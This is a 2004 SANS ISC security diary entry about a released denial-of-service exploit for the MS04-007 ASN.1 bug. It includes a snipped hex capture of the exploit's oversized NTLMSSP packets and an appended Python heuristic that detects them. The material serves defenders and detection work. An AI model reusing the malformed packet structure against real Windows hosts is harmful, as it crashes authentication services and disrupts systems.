SANS ISC: InfoSec Handlers Diary Blog

MS04-007 Exploit released

Published: 2004-02-14
Last Updated: 2004-02-15 03:31:54 UTC
by Mike Poor (Version: 1)
Happy Valentine's Day!

A DoS exploit has been made available that uses the ASN.1 bug (MS04-007). This exploit uses port 445, 139 or 135. While this is just a DoS exploit, more serious exploits may follow soon.

Note: This exploit appears to work only against Windows 2000 Professional. Don't forget history: it wasn't long after the DCOM exploit came out that we saw universal shellcode for almost all Windows platforms.


This may be your last chance to apply the patch!

(See yesterday's diary for more details regarding ASN.1)



The exploit kills lsass.exe (see definition below), fires an error message to the screen, and reboots the machine after approximately 1 minute.


According to Liutilities.com ( http://www.liutilities.com/products/wintaskspro/processlibrary/lsass/ ), lsass is:


Process File: lsass or lsass.exe

Process Name: Local Security Authority Service

Description: Windows Local Security Authority Server Process handles Windows security mechanisms. It verifies the validity of user logons to your computer or server. Technically, the software generates the process that is responsible for authenticating users for the Winlogon service.

Below are screen captures from the error log and lsass crash message:


http://isc.sans.org/images/lsasspopup.gif

http://isc.sans.org/images/errorlog.gif




20:26:04.281879 192.168.1.13.1087 > 192.168.1.11.139: tcp 1460 (DF) (ttl 128, id 438, len 1500)
0x0000 4500 05dc 01b6 4000 8006 6ffd c0a8 010d E.....@...o.....
0x0010 c0a8 010b 043f 008b e01c 2816 ab83 5c57 .....?....(...\W
0x0020 5010 4413 cd30 0000 0000 0885 ff53 4d42 P.D..0.......SMB
0x0030 7300 0000 0008 01c8 0000 0000 0000 0000 s...............
0x0040 0000 0000 0000 7503 0000 0300 0cff 0000 ......u.........
0x0050 00ff ff02 0001 0000 0000 0033 0800 0000 ...........3....
0x0060 005c 0000 804a 0860 8208 2f06 062b 0601 .\...J.`../..+..
0x0070 0505 02a0 8208 2330 8208 1fa0 0e30 0c06 ......#0.....0..
0x0080 0a2b 0601 0401 8237 0202 0aa1 0523 0303 .+.....7.....#..
0x0090 0107 a282 0804 0482 0800 4e54 4c4d 5353 ..........NTLMSS
0x00a0 5000 0100 0000 1502 0860 0900 0900 2000 P........`......
0x00b0 0000 0700 0700 2900 0000 574f 524b 4752 ......)...WORKGR
0x00c0 4f55 5044 4546 4155 4c54 4141 4141 4141 OUPDEFAULTAAAAAA
0x00d0 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
.....
Snip ... ending with this packet:
20:26:04.282134 192.168.1.13.1087 > 192.168.1.11.139: tcp 725 (DF) (ttl 128, id 439, len 765)
0x0000 4500 02fd 01b7 4000 8006 72db c0a8 010d E.....@...r.....
0x0010 c0a8 010b 043f 008b e01c 2dca ab83 5c57 .....?....-...\W
0x0020 5018 4413 4eef 0000 4141 4141 4141 4141 P.D.N...AAAAAAAA
0x0030 4141 4141 4141 4141 4141 4141 4141 4141 AAAAAAAAAAAAAAAA
.....
0x02e0 4141 4141 4141 0055 006e 0069 0078 0000 AAAAAA.U.n.i.x..
0x02f0 0053 0061 006d 0062 0061 0000 00 .S.a.m.b.a...
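To show what the capture above actually carries, here is an added example (not from the diary or from any tool it mentions) that rebuilds the first packet from its tcpdump -X rows, walks IP, TCP, NetBIOS and the SMB Session Setup AndX request to the SPNEGO security blob, decodes the BER long-form lengths, and reports the declared NTLMSSP token size next to what the capture holds. The rows are quoted from this diary (only the first eleven, so the token is truncated); the 256-byte threshold for a "normal" NEGOTIATE message is an assumption of this heuristic.

```python
import re
# Opening rows of the tcpdump -X capture in this diary (IP id 438, port 1087 -> 139); the 0x41
# fill rows and the second packet are left out, so the NTLMSSP token here is truncated.
DUMP = r"""0x0000 4500 05dc 01b6 4000 8006 6ffd c0a8 010d E.....@...o.....
0x0010 c0a8 010b 043f 008b e01c 2816 ab83 5c57 .....?....(...\W
0x0020 5010 4413 cd30 0000 0000 0885 ff53 4d42 P.D..0.......SMB
0x0030 7300 0000 0008 01c8 0000 0000 0000 0000 s...............
0x0040 0000 0000 0000 7503 0000 0300 0cff 0000 ......u.........
0x0050 00ff ff02 0001 0000 0000 0033 0800 0000 ...........3....
0x0060 005c 0000 804a 0860 8208 2f06 062b 0601 .\...J.`../..+..
0x0070 0505 02a0 8208 2330 8208 1fa0 0e30 0c06 ......#0.....0..
0x0080 0a2b 0601 0401 8237 0202 0aa1 0523 0303 .+.....7.....#..
0x0090 0107 a282 0804 0482 0800 4e54 4c4d 5353 ..........NTLMSS
0x00a0 5000 0100 0000 1502 0860 0900 0900 2000 P........`......"""
ROW = re.compile(r"^0x([0-9a-f]{4})((?:\s+[0-9a-f]{2,4})+)")

def dump_to_bytes(text):
    """Rebuild the raw frame from tcpdump -X rows; the trailing ASCII column is ignored."""
    rows = [m for m in (ROW.match(line.strip()) for line in text.splitlines()) if m]
    return b"".join(bytes.fromhex("".join(m.group(2).split()))[:16] for m in rows)

def tlv(buf, pos):
    """Tag, declared length and value offset of the BER element at pos (short or long form)."""
    tag, first = buf[pos], buf[pos + 1]
    n = first & 0x7F if first >= 0x80 else 0          # long form: n length bytes follow
    return tag, (int.from_bytes(buf[pos + 2:pos + 2 + n], "big") if n else first), pos + 2 + n

def inspect_session_setup(pkt):
    """IP -> TCP -> NetBIOS -> SMB Session Setup AndX -> SPNEGO; reports declared vs captured."""
    tcp = (pkt[0] & 0x0F) * 4
    smb = tcp + (pkt[tcp + 12] >> 4) * 4 + 4          # TCP data offset, then 4-byte NetBIOS header
    if pkt[smb:smb + 4] != b"\xffSMB" or pkt[smb + 4] != 0x73:
        return None                                   # not a Session Setup AndX request
    info = {"blob_len": int.from_bytes(pkt[smb + 47:smb + 49], "little")}  # SecurityBlobLength
    blob = smb + 35 + pkt[smb + 32] * 2               # header, WordCount, words, ByteCount
    _, _, p = tlv(pkt, blob)                          # 0x60 GSS-API InitialContextToken
    _, ln, v = tlv(pkt, p)                            # 0x06 SPNEGO OID, skipped
    _, _, p = tlv(pkt, v + ln)                        # 0xa0 NegTokenInit
    _, _, p = tlv(pkt, p)                             # 0x30 SEQUENCE of its fields
    while p + 1 < len(pkt):                           # stops cleanly on a truncated capture
        tag, ln, v = tlv(pkt, p)
        if tag == 0xA2:                               # [2] mechToken: OCTET STRING with NTLMSSP
            _, ln, v = tlv(pkt, v)
            msg_type = int.from_bytes(pkt[v + 8:v + 12], "little")
            # a genuine NEGOTIATE (Type 1) holds only flags and two short names, never kilobytes
            info.update(ntlmssp_len=ln, ntlmssp_captured=len(pkt) - v, msg_type=msg_type,
                        oversized_negotiate=pkt[v:v + 8] == b"NTLMSSP\0" and msg_type == 1 and ln > 256)
            return info
        p = v + ln
    return info
```

On the diary's packet this reports an SMB SecurityBlobLength of 2099 bytes and an NTLMSSP Type 1 token declared at 2048 bytes, which is the length-versus-content mismatch a sensor can key on without waiting for the crash.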


Handler on Duty: Mike Poor [ mike@intelguardians.com ]